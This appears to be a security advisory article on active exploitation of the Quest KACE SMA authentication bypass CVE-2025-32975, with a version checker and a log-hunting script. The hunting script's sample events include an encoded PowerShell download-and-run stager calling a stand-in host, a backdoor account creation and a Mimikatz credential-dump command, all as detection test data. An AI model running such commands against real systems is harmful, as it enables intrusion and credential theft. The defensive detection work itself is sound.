
Attackers Exploit Critical Quest KACE SMA Authentication Bypass

Take action: If you are running Quest KACE SMA, treat this as urgent. Take the appliance off the public internet and put it behind a VPN immediately. Review its logs for new or unfamiliar administrative accounts; they are a sign that attackers have already taken control of your management system. Then patch as soon as possible.


Learn More

Arctic Wolf researchers report malicious activity targeting Quest KACE Systems Management Appliance (SMA) instances starting the week of March 9, 2026. Quest KACE SMA is an on-premises tool used for centralized endpoint management, software deployment, and patching. 

The attacks exploit a critical authentication bypass vulnerability that was originally patched in May 2025 but remains a threat to unpatched, internet-facing systems. Attackers are looking for publicly exposed instances to gain an initial foothold into corporate networks.

The exploited flaw is tracked as CVE-2025-32975 (CVSS score 9.8), an authentication bypass in the appliance's Single Sign-On (SSO) handling. Exploiting it lets an attacker skip the credential check and obtain full administrative control of the appliance, which in turn allows them to run arbitrary commands through the KPluginRunProcess function and deploy malicious payloads.

Quest patched the following flaws in the same patch cycle:

  • CVE-2025-32976 - Unauthorized system access.
  • CVE-2025-32977 - Remote access vulnerability.
  • CVE-2025-32978 - Privilege escalation flaw.

After gaining administrative access, attackers establish persistence by creating new accounts such as "ooo1" and "ooo2" through the KACE agent process runkbot.exe. They also run hidden PowerShell scripts and modify registry keys to maintain their presence on the network. To harvest credentials and move laterally to critical systems they use tools such as Mimikatz, often renamed to asd.exe.

The vulnerability affects the following Quest KACE SMA branches; any build below the listed one is vulnerable to these attacks:

  • 13.0.x before 13.0.385
  • 13.1.x before 13.1.81
  • 13.2.x before 13.2.183
  • 14.0.x before 14.0.341 (Patch 5)
  • 14.1.x before 14.1.101 (Patch 4)

Quest has released fixed builds for all of these branches, and administrators should verify their appliance's current version immediately.
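The version check has a branch-specific pitfall: comparing an appliance against the single newest build would wrongly flag 14.0.341 (Patch 5) as vulnerable even though it is the fixed build on the 14.0 line. The following is an added example (not Quest's code or tooling) that compares a KACE SMA version string against the fixed build for its own branch, using only the builds listed above; the version strings fed to it at the bottom are constructed for illustration.

```python
import re

# Lowest fixed build on each branch, taken from the affected-version list
# above. KACE shows builds as "14.0.341 (Patch 5)"; the patch label is ignored.
FIXED_BUILDS = {
    (13, 0): (13, 0, 385),
    (13, 1): (13, 1, 81),
    (13, 2): (13, 2, 183),
    (14, 0): (14, 0, 341),
    (14, 1): (14, 1, 101),
}


def parse_version(text):
    """Extract (major, minor, build) from a string such as '14.0.341 (Patch 5)'."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no major.minor.build found in {text!r}")
    return tuple(int(part) for part in m.groups())


def status(text):
    """Return 'vulnerable', 'fixed', or 'unlisted' (branch not in the advisory).

    The comparison is done against the fixed build of the same major.minor
    branch, not against the newest build overall.
    """
    version = parse_version(text)
    fixed = FIXED_BUILDS.get(version[:2])
    if fixed is None:
        return "unlisted"  # not covered by the list above; confirm with Quest
    return "vulnerable" if version < fixed else "fixed"


if __name__ == "__main__":
    # Constructed sample version strings, not output from a real appliance.
    for v in ["13.1.80", "13.1.81", "14.0.341 (Patch 5)", "14.0.300",
              "14.1.101 (Patch 4)", "12.1.169"]:
        print(f"{v:22} {status(v)}")
```

A branch that returns "unlisted" (anything older than 13.0 in the list above) should be treated as unknown rather than safe until the vendor's current guidance is checked.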

Organizations should update their Quest KACE SMA instances to the fixed build for their branch (for example, 14.1.101 (Patch 4) on the 14.1 line) as soon as possible. Administrators should also make sure these appliances are not reachable from the public internet and restrict access to them through a VPN or firewall.

It is also important to audit system logs for Base64-encoded payloads, unauthorized administrative accounts, and unusual RDP connections to backup servers.
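To make the hunting guidance above concrete, here is an added example (not code from Arctic Wolf, Quest, or the original article) that runs over exported Windows Security log records in dict form and flags the post-exploitation activity described: account creation through runkbot.exe, the "ooo1"/"ooo2" account names, Base64-encoded PowerShell (which it decodes), Mimikatz renamed to asd.exe, and RDP logons to backup servers. The backup-server hostnames, the sample event records, and the stager URL inside them are all constructed for the example.

```python
import base64
import re

# Indicators taken from the write-up above.
KNOWN_ATTACKER_ACCOUNTS = {"ooo1", "ooo2"}
KACE_AGENT = "runkbot.exe"
MIMIKATZ_ALIAS = "asd.exe"
# Backup-server hostnames are site specific; this set is an assumption.
BACKUP_HOSTS = {"BACKUP01", "VEEAM01"}
# Shells and account tools that the KACE agent should not normally spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe"}
# PowerShell's -e/-ec/-enc/-EncodedCommand switch followed by a Base64 blob.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand script (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Return (finding, detail) pairs for records matching the TTPs described above."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4720:  # a user account was created
            user = ev["TargetUserName"].lower()
            kind = "known_attacker_account" if user in KNOWN_ATTACKER_ACCOUNTS else "review_new_account"
            findings.append((kind, user))
        elif eid == 4688:  # a new process has been created
            image = basename(ev["NewProcessName"])
            parent = basename(ev.get("ParentProcessName", ""))
            cmd = ev.get("CommandLine", "")
            if parent == KACE_AGENT and image in SHELLS:
                findings.append(("kace_agent_spawned_shell", cmd))
            if image == MIMIKATZ_ALIAS:
                findings.append(("mimikatz_alias", ev["NewProcessName"]))
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append(("encoded_powershell", decoded))
        elif eid == 4624 and ev.get("LogonType") == 10:  # RemoteInteractive, i.e. RDP
            host = ev["Computer"].upper()
            if host in BACKUP_HOSTS or ev["TargetUserName"].lower() in KNOWN_ATTACKER_ACCOUNTS:
                findings.append(("rdp_logon", f"{ev['TargetUserName']}@{host}"))
    return findings


# Constructed sample records (not real telemetry) shaped like Security log events.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\net.exe",
     "ParentProcessName": r"C:\Program Files (x86)\Quest\KACE\runkbot.exe",
     "CommandLine": "net user ooo1 P@ssw0rd /add"},
    {"EventID": 4720, "TargetUserName": "ooo1"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files (x86)\Quest\KACE\runkbot.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\Public\asd.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "asd.exe sekurlsa::logonpasswords"},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "ooo2", "Computer": "backup01"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for kind, detail in hunt(SAMPLE_EVENTS):
        print(f"{kind:26} {detail}")
```

The "review_new_account" finding is intentionally broad: every account creation in the window since the week of March 9, 2026 deserves a look, not only the two names reported, since an attacker with full administrative control of the appliance can pick any name.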
